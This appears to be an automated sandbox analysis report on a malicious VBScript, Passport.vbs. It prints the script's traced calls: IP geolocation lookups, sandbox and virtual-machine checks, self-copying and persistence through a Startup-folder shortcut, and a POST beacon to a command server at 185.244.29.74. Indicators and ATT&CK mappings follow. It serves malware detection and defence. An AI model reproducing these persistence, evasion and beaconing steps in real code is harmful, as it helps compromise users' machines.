Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: pesuti.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\Passport.vbs

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();5000IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbem

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Passport.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49730
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: Initial file: If objItem.Model = "Google Compute Engine" Then
Source: C:\Windows\System32\wscript.exeDropped file: If objItem.Model = "Google Compute Engine" ThenJump to dropped file
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnq
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCFA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP@

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 34.117.59.81 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.244.29.74 456Jump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information421
Scripting
Valid Accounts11
Windows Management Instrumentation
421
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping111
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
2
Registry Run Keys / Startup Folder
2
Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media11
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
Security Account Manager1
System Network Configuration Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS2
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets22
System Information Discovery
SSHKeylogging14
Application Layer Protocol
Scheduled TransferData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Passport.vbs0%ReversingLabs
Passport.vbs3%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
ipinfo.io0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://185.244.29.74:456/document0%VirustotalBrowse
https://ipinfo.io/countryS0%VirustotalBrowse
https://ipinfo.io/org0%VirustotalBrowse
https://ipinfo.io/country0%VirustotalBrowse
https://ipinfo.io/countryq0%VirustotalBrowse
https://ipinfo.io/countryW0%VirustotalBrowse
https://ipinfo.io/0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
ipinfo.io
34.117.59.81
truetrueunknown
NameMaliciousAntivirus DetectionReputation
http://185.244.29.74:456/documenttrueunknown
https://ipinfo.io/orgtrueunknown
https://ipinfo.io/countrytrueunknown
NameSourceMaliciousAntivirus DetectionReputation
http://185.244.29.74:456/documentBwscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    http://185.244.29.74:456/documentGwscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://ipinfo.io/countryz%wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://ipinfo.io/country6%wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://185.244.29.74:456/documentage:wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://ipinfo.io/countrySwscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            http://185.244.29.74:456/documentTwscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://ipinfo.io/countryY:wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://185.244.29.74:456/documentnEwscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.244.29.74/jwscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.244.29.74:456/documentXwscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://185.244.29.74:456/documentJwscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.244.29.74:456/document32wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.244.29.74:456/document&wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://ipinfo.io/wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmptrueunknown
                            https://ipinfo.io/countryqwscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://185.244.29.74/d1wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://185.244.29.74:456/document_wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://185.244.29.74:456/documentrwscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://185.244.29.74:456/documentqwscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://185.244.29.74:456/documentgEwscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://ipinfo.io/countryWwscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://ipinfo.io/org_wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://185.244.29.74/wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://ipinfo.io/country_wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            34.117.59.81
                                            ipinfo.ioUnited States
                                            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                            185.244.29.74
                                            unknownNetherlands
                                            209623DAVID_CRAIGGGtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1523251
                                            Start date and time:2024-10-01 11:00:07 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 8s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:5
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Passport.vbs
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winVBS@2/7@1/2
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs
                                            • Override analysis time to 240s for JS/VBS files not yet terminated
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            11:01:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            34.117.59.81YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            lePDF.cmdGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            JuhnladbIs.qao.dllGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            bdsBbxwPyV.ena.dllGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            fblXRRCHON.pos.dllGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            GmsiIZXruf.hos.dllGet hashmaliciousUnknownBrowse
                                            • ipinfo.io/json
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ipinfo.ioOuaJzAFCTk.exeGet hashmaliciousDCRatBrowse
                                            • 34.117.59.81
                                            0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 34.117.59.81
                                            http://telegsramc.club/Get hashmaliciousTelegram PhisherBrowse
                                            • 34.117.59.81
                                            http://cancelarpedidoaqui003.weebly.com/Get hashmaliciousUnknownBrowse
                                            • 34.117.59.81
                                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                            • 34.117.59.81
                                            http://telegriame.club/Get hashmaliciousTelegram PhisherBrowse
                                            • 34.117.59.81
                                            http://telegrvams.club/Get hashmaliciousTelegram PhisherBrowse
                                            • 34.117.59.81
                                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                            • 34.117.59.81
                                            http://glamorous-productive-baboon.glitch.me/Get hashmaliciousUnknownBrowse
                                            • 34.117.59.81
                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                            • 34.117.59.81
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            DAVID_CRAIGGGExeFile (351).exeGet hashmaliciousQuasarBrowse
                                            • 91.193.75.100
                                            PO-4ADB89.batGet hashmaliciousAgentTeslaBrowse
                                            • 185.244.30.19
                                            Ozb8aojWew.exeGet hashmaliciousGuLoaderBrowse
                                            • 185.244.30.5
                                            P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                            • 185.244.30.5
                                            9y5FW1JvLf.exeGet hashmaliciousRemcosBrowse
                                            • 185.140.53.144
                                            ORDER-245140097DF.jsGet hashmaliciousAsyncRATBrowse
                                            • 185.165.153.116
                                            SecuriteInfo.com.Linux.Kaiji.16.13149.10467.elfGet hashmaliciousChaosBrowse
                                            • 185.140.53.36
                                            SecuriteInfo.com.ELF.Chaos-B.4493.24448.elfGet hashmaliciousChaosBrowse
                                            • 185.140.53.36
                                            SecuriteInfo.com.Trojan.Linux.GenericKD.24461.21195.15576.elfGet hashmaliciousChaosBrowse
                                            • 185.140.53.36
                                            SecuriteInfo.com.ELF.Agent-BSR.32705.13148.elfGet hashmaliciousChaosBrowse
                                            • 185.140.53.36
                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttp://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                            • 34.117.188.166
                                            OuaJzAFCTk.exeGet hashmaliciousDCRatBrowse
                                            • 34.117.59.81
                                            Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                            • 34.117.239.71
                                            0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 34.117.59.81
                                            https://en.softonic.comGet hashmaliciousUnknownBrowse
                                            • 34.117.239.71
                                            https://ole798.com/Get hashmaliciousUnknownBrowse
                                            • 34.117.77.79
                                            https://www.iphone.trustefy.org/Get hashmaliciousUnknownBrowse
                                            • 34.117.77.79
                                            https://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                            • 34.117.77.79
                                            https://elderly-same-archeology.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                            • 34.117.77.79
                                            https://currently8220.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                            • 34.117.77.79
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                            • 34.117.59.81
                                            18000012550_20240930_0078864246#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 34.117.59.81
                                            PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                                            • 34.117.59.81
                                            A 413736796#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 34.117.59.81
                                            Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                            • 34.117.59.81
                                            SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                            • 34.117.59.81
                                            Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 34.117.59.81
                                            6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 34.117.59.81
                                            hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 34.117.59.81
                                            N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 34.117.59.81
                                            No context
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):3
                                            Entropy (8bit):1.584962500721156
